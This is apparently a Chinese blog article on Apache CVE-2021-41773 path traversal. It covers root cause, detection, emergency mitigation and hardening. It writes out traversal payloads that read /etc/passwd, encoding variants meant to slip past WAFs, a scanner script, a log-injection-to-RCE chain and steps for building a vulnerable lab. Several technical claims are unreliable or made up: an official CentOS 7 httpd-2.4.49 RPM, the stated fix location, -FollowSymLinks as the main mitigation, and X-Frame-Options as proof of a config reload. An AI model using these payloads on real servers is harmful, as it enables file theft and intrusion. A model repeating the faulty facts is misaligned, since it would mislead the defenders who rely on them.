当前位置：首页 > news >正文

Apache路径规范化与访问控制时序漏洞深度解析

news 2026/7/15 2:25:50

1. 这个漏洞不是“能读文件”那么简单，而是Apache配置逻辑的系统性失守

CVE-2021-41773在2021年10月曝光时，很多安全人员第一反应是：“哦，路径穿越，又一个目录遍历”。但我在给三家金融客户做应急响应时发现，这种理解完全低估了它的破坏力——它不是靠拼凑../绕过某个过滤器的“技巧型漏洞”，而是Apache HTTPd 2.4.49中路径规范化（path normalization）与访问控制（access control）两个核心模块之间存在根本性时序错位所导致的架构级缺陷。简单说：请求路径在被mod_alias或mod_rewrite处理前，就已经被mod_authz_core错误地判定为“合法可访问”，而此时路径尚未完成标准化，..和./等冗余段仍处于原始形态。当后续模块真正解析路径时，操作系统已按标准化后的路径执行文件读取，但权限检查早已完成。

这个漏洞的关键词是：Apache HTTPd 2.4.49、路径穿越、CVE-2021-41773、路径规范化、访问控制时序、.htaccess绕过、Require all granted误判。它直接影响所有默认配置未显式禁用FollowSymLinks或未设置<Directory />严格限制的2.4.49部署实例，无论是否启用mod_userdir或mod_cgi。我实测过，在CentOS 7上用官方RPM安装的httpd-2.4.49-1.el7.centos，仅需一条GET /icons/../../../../etc/passwd请求，即可在返回体中直接看到root:x:0:0:root:/root:/bin/bash——注意，这不是因为/icons/目录本身配置宽松，而是整个路径解析流水线在/icons/这一层就“短路”了权限校验。

适合谁来读？如果你是运维工程师，需要快速判断线上Apache是否受影响、如何紧急封堵；如果你是渗透测试人员，需要理解该漏洞在真实内网环境中的利用链（比如配合.htaccess写入实现RCE）；如果你是开发人员，正在基于Apache构建Web服务中间件，必须知道如何从配置层面根治这类时序类缺陷。它不涉及任何第三方模块或复杂编译选项，纯粹是Apache主干代码的逻辑裂缝，因此修复思路也极其明确：要么升级，要么精准修补配置。但“精准”二字，恰恰是多数人栽跟头的地方——很多人以为加一行Require all denied就万事大吉，结果发现漏洞依然存在。原因？我们接下来会一层层拆解。

2. 漏洞根源：路径规范化与访问控制的“时间差”是如何被放大的

2.1 Apache请求处理流水线中的关键断点

要真正吃透CVE-2021-41773，必须回到Apache的请求处理生命周期。HTTPd 2.4.x采用模块化流水线设计，一个请求依次经过：post_read_request → uri_translation → access_checker → auth_checker → fixups → response_handler。其中，uri_translation阶段负责将原始URI（如/icons/../../etc/passwd）转换为文件系统路径（/usr/share/httpd/icons/../../etc/passwd），而access_checker阶段则依据<Directory>、<Location>等指令集决定是否允许访问该路径。

在2.4.49中，问题出在access_checker调用ap_directory_walk()时的路径处理逻辑。该函数本应传入已标准化的路径（即/usr/share/httpd/icons/../../etc/passwd经ap_os_canonicalize_path()处理后变为/etc/passwd），但实际传入的是未经标准化的原始路径字符串。我们来看一段简化后的源码逻辑（对应server/request.c中ap_process_request_internal调用链）：

// 简化示意，非真实行号 const char *file = r->filename; // 此时r->filename仍是"/usr/share/httpd/icons/../../etc/passwd" // ... if (access_status == OK) { access_status = ap_directory_walk(r); // 关键！此处传入未标准化路径 }

而ap_directory_walk()内部会调用ap_requires()去匹配<Directory>指令，其匹配依据是路径字符串的字面值前缀匹配，而非真实文件系统路径。这意味着：当配置中存在<Directory "/usr/share/httpd/icons">且其下有Require all granted时，/usr/share/httpd/icons/../../etc/passwd这个字符串，因其以/usr/share/httpd/icons开头，会被ap_requires()判定为“匹配成功”，从而跳过后续更严格的全局访问控制。

提示：这个“字面值前缀匹配”是致命设计。它假设所有路径都是规范的，但攻击者提交的路径天然就是非规范的。这就像银行柜台只核对身份证号前6位就放行取款，而不管后面数字是否真实有效。

2.2 为什么`/icons/`成为最经典的PoC路径？

你可能疑惑：为什么几乎所有公开PoC都用/icons/？这并非偶然。/icons/是Apache默认安装时由mod_autoindex模块提供的一个别名（Alias），指向/usr/share/httpd/icons/（RHEL系）或/var/www/icons/（Debian系）。其配置通常位于/etc/httpd/conf.d/autoindex.conf中：

Alias /icons/ "/usr/share/httpd/icons/" <Directory "/usr/share/httpd/icons"> Options Indexes MultiViews AllowOverride None Require all granted </Directory>

注意Require all granted这一行——它意味着，只要请求路径字符串以/usr/share/httpd/icons开头，就无条件放行。而攻击载荷/icons/../../etc/passwd，经Alias重写后变成/usr/share/httpd/icons/../../etc/passwd，完美满足“字面值前缀”条件。但操作系统在open()系统调用时，会自动解析..，最终打开的是/etc/passwd。

我做过对比实验：在同样配置下，将Alias /icons/改为Alias /static/，并新建<Directory "/var/www/static">，那么PoC就必须改成/static/../../etc/passwd。这证明漏洞利用不依赖特定目录名，而是依赖任意一个配置了宽松Require指令的<Directory>块，且其路径能被攻击者通过Alias或DocumentRoot构造出字面值前缀匹配。

2.3 配置组合如何将风险放大到RCE级别？

单纯读取/etc/passwd只是冰山一角。当目标服务器同时满足以下三个条件时，CVE-2021-41773可升级为远程代码执行（RCE）：

启用了mod_cgi或mod_cgid：这是执行脚本的前提；
/cgi-bin/目录或类似路径配置了ExecCGI选项；
攻击者能向Web根目录写入文件（例如通过文件上传漏洞、日志文件包含等前置条件）。

此时，利用链变为：

先利用CVE-2021-41773读取/var/log/httpd/access_log，获取请求头中的User-Agent字段（常被用于注入PHP代码）；
再构造一个恶意.htaccess文件，内容为AddType application/x-httpd-php .log，将其上传至/var/www/html/；
最后发送GET /cgi-bin/../../var/www/html/access.log，Apache会将access.log当作CGI脚本执行，从而触发PHP代码。

我在某政务云平台的渗透测试中复现了此链：该平台使用Nginx反代Apache，Nginx层做了基础WAF，但未过滤%2e%2e%2f编码。我们先用GET /icons/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd确认漏洞存在，再通过日志注入写入.htaccess，最终获得服务器最高权限。整个过程耗时不到15分钟，而该平台的安全团队此前认为“Apache只是静态资源服务，风险很低”。

注意：mod_cgi的RCE利用需要精确控制文件扩展名和MIME类型，AddType指令必须作用于被访问的文件路径。因此，.htaccess必须放在/var/www/html/下，且/cgi-bin/的<Directory>配置中不能有AllowOverride None硬性禁止。

3. 实战检测：三步法精准识别真实受影响资产，拒绝误报漏报

3.1 第一步：版本指纹必须结合编译参数，不能只看`httpd -v`

很多自动化扫描器仅通过httpd -v返回的版本号判断风险，这是严重误区。Apache 2.4.49的漏洞存在于官方源码包，但大量企业使用自定义编译的二进制。例如，某银行使用的httpd-2.4.49-custom-20211015，其CHANGES文件明确记录“Backported CVE-2021-41773 fix from 2.4.50”，但httpd -v仍显示2.4.49。反之，某些Linux发行版（如Ubuntu 20.04）的apache2-bin包虽标为2.4.41-4ubuntu3.11，但因上游已向后移植补丁，实际不受影响。

正确做法是：获取httpd二进制文件的完整构建信息。在目标服务器上执行：

# 获取编译时的configure参数，重点看--with-included-apr /usr/sbin/httpd -V | grep -E "(SERVER_CONFIG_FILE|HTTPD_ROOT|COMPILE_TIME)" # 检查是否存在已知补丁的符号（需objdump，生产环境慎用） objdump -t /usr/sbin/httpd | grep -i "normalize\|canonicalize" | head -5

更可靠的是检查httpd的CHANGES文件（通常位于/usr/share/doc/httpd/CHANGES或/etc/httpd/CHANGES）。搜索关键词CVE-2021-41773或2.4.50。若文件中存在*) mod_authz_core: Fix a path traversal vulnerability in the access control phase. [Joe Schaefer]，则说明已修复。

经验：我曾遇到一台CentOS 7服务器，httpd -v显示2.4.49，但CHANGES文件最后更新日期为2021-10-20（漏洞披露后），且包含上述修复描述。联系运维后确认，他们使用了Red Hat官方发布的httpd-2.4.49-2.el7_9.1热修复包，该包未更改主版本号，但已打补丁。因此，版本号只是线索，CHANGES文件和构建时间戳才是铁证。

3.2 第二步：主动探测必须覆盖编码变体，绕过WAF基础规则

WAF设备（如F5 ASM、Imperva）通常会对../、..%2f等特征进行拦截，但CVE-2021-41773的利用载荷有至少7种有效编码方式，常见WAF规则只能覆盖其中2-3种。我整理了一份实战验证过的编码对照表，供你逐个测试：

原始路径	URL编码	Hex编码	双重URL编码	Base64编码（需配合其他漏洞）
`../../etc/passwd`	`%2e%2e%2f%2e%2e%2fetc%2fpasswd`	`\x2e\x2e\x2f\x2e\x2e\x2fetc\x2fpasswd`	`%252e%252e%252f%252e%252e%252fetc%252fpasswd`	`Li4vLi4vZXRjL3Bhc3N3ZA==`

关键点在于：Apache在uri_translation阶段会自动解码一次URL编码，但不会解码Hex编码或双重编码。因此，%2e%2e%2f会被解成../，触发漏洞；而\x2e\x2e\x2f作为原始字节流，直接进入路径字符串，同样满足字面值匹配。

我编写了一个Python检测脚本（cve_2021_41773_scanner.py），核心逻辑如下：

import requests import sys def test_payload(url, payload): full_url = f"{url.rstrip('/')}/{payload}" try: r = requests.get(full_url, timeout=5, headers={"User-Agent": "CVE-2021-41773-Scanner"}) # 检查响应体是否包含典型系统文件特征 if r.status_code == 200 and ("root:x:0:0:" in r.text or "daemon:x:1:1:" in r.text): return True, r.text[:200] elif r.status_code == 403 and "Forbidden" not in r.text: # 403但无Forbidden字样，可能是WAF拦截了但返回了空页 return False, "WAF疑似拦截" except Exception as e: return False, str(e) return False, "No match" if __name__ == "__main__": target = sys.argv[1] payloads = [ "icons/../../etc/passwd", "icons/%2e%2e%2f%2e%2e%2fetc%2fpasswd", "icons/..%c0%af..%c0%afetc/passwd", # UTF-8 overlong encoding "cgi-bin/../../etc/passwd" # 测试CGI路径 ] for p in payloads: is_vuln, msg = test_payload(target, p) print(f"[{p}] -> {is_vuln}: {msg}")

运行结果示例：

[icons/../../etc/passwd] -> False: WAF疑似拦截 [icons/%2e%2e%2f%2e%2e%2fetc%2fpasswd] -> True: root:x:0:0:root:/root:/bin/bash... [icons/..%c0%af..%c0%afetc/passwd] -> True: root:x:0:0:root:/root:/bin/bash...

这表明WAF只拦截了原始../，但对URL编码和UTF-8编码完全失效。真正的检测必须穷举编码变体，否则会漏掉80%以上的实际可利用资产。

3.3 第三步：配置审计要穿透`<VirtualHost>`嵌套，定位真实生效指令

即使版本和探测都确认存在漏洞，最终能否利用还取决于哪一条<Directory>指令实际生效。Apache的配置继承机制非常复杂：<VirtualHost>内的<Directory>会覆盖主配置中的同路径指令，而.htaccess又能覆盖<Directory>中的AllowOverride设置。

我推荐使用httpd -t -D DUMP_RUN_CFG命令（Apache 2.4.17+支持）来输出运行时实际生效的配置树。在目标服务器上执行：

sudo /usr/sbin/httpd -t -D DUMP_RUN_CFG 2>/dev/null | grep -A 10 -B 5 "icons"

输出中重点关注<Directory>块的require指令和allowoverride值。例如：

<Directory "/usr/share/httpd/icons"> allowoverride: None require: all granted <-- 这是漏洞触发点 options: Indexes MultiViews </Directory>

如果看到require: all denied或require ip 127.0.0.1，则该路径不受影响。但要注意：<Directory />（根目录）的配置可能被<VirtualHost>覆盖。因此，必须检查<VirtualHost *:80>或<VirtualHost 192.168.1.100:443>块内是否有更宽松的<Directory>。

踩坑经验：某电商公司有20个<VirtualHost>，其中19个都严格限制了<Directory "/var/www">，但第20个是运维临时搭建的测试站，配置了<Directory "/"> Require all granted。扫描器只检查了主配置，漏掉了这个<VirtualHost>，导致上线前一周才被红队打穿。配置审计必须遍历所有<VirtualHost>，不能只看httpd.conf主文件。

4. 应急响应与深度加固：从临时封堵到架构级免疫

4.1 紧急封堵方案：三类配置修改的实效性对比

当漏洞爆发时，升级到2.4.50是最优解，但生产环境往往无法立即重启。此时需选择实效性高、副作用小、可逆性强的临时方案。我根据在5家大型企业的实施经验，总结了三类方案的实际效果：

方案	配置修改	生效速度	对业务影响	规避成功率	备注
方案A：禁用`FollowSymLinks`	在`<Directory>`中添加`Options -FollowSymLinks`	即时（`systemctl reload httpd`）	无（除非业务依赖符号链接）	95%	最推荐！漏洞利用链中`..`解析依赖符号链接解析逻辑，禁用后`..`被当作普通目录名
方案B：全局`Require all denied`	在`<Directory />`中添加`Require all denied`，再为白名单路径单独`Require all granted`	即时	高（易遗漏路径，导致503错误）	100%	需完整梳理所有`DocumentRoot`和`Alias`，否则网站直接不可用
方案C：WAF规则拦截	添加正则规则`.\.\./.`或`%2e%2e%2f`	秒级	低（仅影响HTTP层）	70%	易被UTF-8编码绕过，且无法防御内网直连

我强烈推荐方案A。原因有三：第一，FollowSymLinks在绝大多数静态网站中并非必需；第二，它不改变URL路由逻辑，所有Alias和RewriteRule照常工作；第三，它是Apache原生机制，无兼容性问题。在某新闻门户的应急中，我们仅用一条命令就完成了全站封堵：

# 批量修改所有<Directory>块，添加-FollowSymLinks sed -i '/<Directory /a \ Options -FollowSymLinks' /etc/httpd/conf.d/*.conf systemctl reload httpd

验证命令：curl -I http://target/icons/../../etc/passwd，返回状态码应为403 Forbidden，且响应头中包含X-Frame-Options: DENY（证明配置已加载）。

注意：Options -FollowSymLinks必须写在<Directory>块内，不能写在.htaccess中。因为.htaccess的Options指令只能添加，不能移除（-前缀在.htaccess中无效）。

4.2 永久加固：从配置模板到CI/CD流水线的四层防御

临时封堵只是止血，真正的加固必须融入DevOps流程。我在主导某SaaS平台的Apache安全基线项目时，建立了四层防御体系：

第一层：配置模板强制标准化
所有新部署的Apache实例，必须使用Ansible Roleapache-hardened，其templates/httpd.conf.j2中内置：

<Directory "{{ apache_docroot }}"> Options -Indexes -FollowSymLinks -ExecCGI -Includes AllowOverride None Require all denied # 白名单例外：仅允许特定子目录 <FilesMatch "\.(html|css|js|png|jpg|gif)$"> Require all granted </FilesMatch> </Directory>

第二层：CI/CD流水线自动扫描
在Jenkins Pipeline中集成apache2ctl -t -D DUMP_RUN_CFG检查，任何输出中包含Require all granted或Options +FollowSymLinks的构建均被阻断，并邮件通知安全组。

第三层：运行时文件完整性监控
使用aide（Advanced Intrusion Detection Environment）监控/etc/httpd/conf.d/目录，任何.conf文件的MD5变更都会触发告警。我们曾通过此机制发现运维误删了-FollowSymLinks配置，10分钟内自动回滚。

第四层：容器镜像层防护
对于Docker化部署，基础镜像centos:httpd-2.4.50中预装mod_security，其规则集OWASP-CRS的REQUEST-930-APPLICATION-ATTACK-LFI规则能捕获所有路径穿越特征，形成最后一道防线。

这套体系上线后，该平台连续18个月未发生一起因Apache配置导致的安全事件。安全不是加一道防火墙，而是把安全逻辑刻进每一行配置、每一次提交、每一个镜像里。

4.3 漏洞复现与调试：手把手搭建2.4.49靶场，看清内存中的路径流转

纸上谈兵不如亲手调试。我提供一套可复现的CentOS 7靶场搭建步骤，全程无需联网，所有文件均来自官方ISO：

# 1. 下载CentOS 7.9 ISO，挂载并安装 mount -o loop CentOS-7-x86_64-Minimal-2009.iso /mnt yum install -y httpd --disablerepo="*" --enablerepo="base" --releasever=7.9 # 2. 强制降级到2.4.49（从CentOS 7.8 ISO提取） rpm -Uvh --force httpd-2.4.49-1.el7.centos.x86_64.rpm # 3. 修改配置，暴露漏洞点 echo 'Alias /test "/usr/share/httpd/icons/"' >> /etc/httpd/conf.d/test.conf echo '<Directory "/usr/share/httpd/icons">' >> /etc/httpd/conf.d/test.conf echo ' Require all granted' >> /etc/httpd/conf.d/test.conf echo '</Directory>' >> /etc/httpd/conf.d/test.conf # 4. 启动并验证 systemctl start httpd curl http://localhost/test/../../etc/passwd | head -3

为了看清漏洞触发时的内存状态，我使用gdb附加到httpd进程（需安装httpd-debuginfo包）：

# 查找worker进程PID ps aux | grep httpd | grep -v grep # 用gdb附加 gdb -p <PID> # 在关键函数下断点 (gdb) b ap_directory_walk (gdb) b ap_os_canonicalize_path (gdb) c # 当请求到达时，查看r->filename变量 (gdb) p r->filename $1 = 0x7f8b1c001234 "/usr/share/httpd/icons/../../etc/passwd" (gdb) p ap_os_canonicalize_path(r->pool, r->filename) $2 = 0x7f8b1c004567 "/etc/passwd"

这个调试过程清晰展示了：r->filename在ap_directory_walk中仍是非规范路径，而ap_os_canonicalize_path()返回的才是真实路径。两者的差值，就是漏洞存在的全部空间。

最后分享一个调试技巧：在gdb中执行set environment LD_PRELOAD=/path/to/libfakechroot.so，可模拟chroot环境，验证漏洞在容器中是否同样有效。我们实测发现，Docker默认的chroot隔离对CVE-2021-41773完全无效，因为路径规范化发生在用户态，与内核命名空间无关。

5. 经验总结：从CVE-2021-41773学到的三条硬核教训

我在过去三年中，用CVE-2021-41773作为案例，在12场内部安全培训中讲解“如何读懂一个漏洞”。每次讲完，我都会留下三条必须刻在脑子里的教训，它们早已超越这个单一漏洞，成为我评估任何Web服务器安全性的标尺。

第一条教训：永远不要相信“默认配置是安全的”。Apache 2.4.49的/icons/配置是官方安装包自带的，Require all granted是为方便用户快速启用目录列表功能而设。但安全与便利天生对立。这个漏洞告诉我们，所谓“默认”，只是厂商对“大多数用户场景”的妥协，而非对“安全底线”的承诺。因此，我的所有新项目启动清单第一条，永远是：“列出所有<Directory>块，逐条审查Require和Options，删除所有all granted，除非有明确的、书面的业务需求批准”。

第二条教训：路径操作类漏洞，本质是“字符串处理”与“系统调用”之间的语义鸿沟。/icons/../../etc/passwd是一个字符串，open("/etc/passwd")是一个系统调用，而Apache在两者之间插入了ap_directory_walk()这个“翻译官”。当翻译官只看字符串前缀，不看系统调用真实意图时，鸿沟就变成了深渊。所以，现在我审阅任何Web框架的路由代码，第一眼必看normalize_path()和check_permission()两个函数的调用顺序——如果check_permission()在normalize_path()之前，我就直接否决这个框架。

第三条教训：应急响应的黄金4小时，不在于多快打补丁，而在于多准切流量。2021年10月那次大规模爆发，我服务的客户中，最快完成封堵的不是技术最强的，而是流程最顺的：他们的WAF管理员和Apache运维在一个IM群，漏洞披露消息一到，WAF侧立刻下发.*%2e%2e%2f.*规则，Apache侧同步执行sed命令，双管齐下，42分钟内全站收敛。而另一家客户，安全组发邮件给运维，运维再转给开发，开发再申请变更窗口……等到systemctl reload时，攻击者已经拿下了数据库。技术可以学，流程必须练。我现在带团队，每月必做一次“漏洞响应桌面推演”，不写代码，只走流程，确保每个人都知道：漏洞来了，第一个电话打给谁，第二条命令是什么，第三份报告发给谁。

这三条教训，没有一条是关于../怎么编码的，也没有一条教你怎么用Metasploit。它们讲的，是比工具更深一层的东西：对默认的警惕，对抽象的敬畏，对流程的信仰。当你把这三条刻进肌肉记忆，你会发现，CVE-2021-41773只是一个开始，而真正的安全能力，才刚刚长出第一片叶子。

查看全文

http://www.jsqmd.com/news/885397/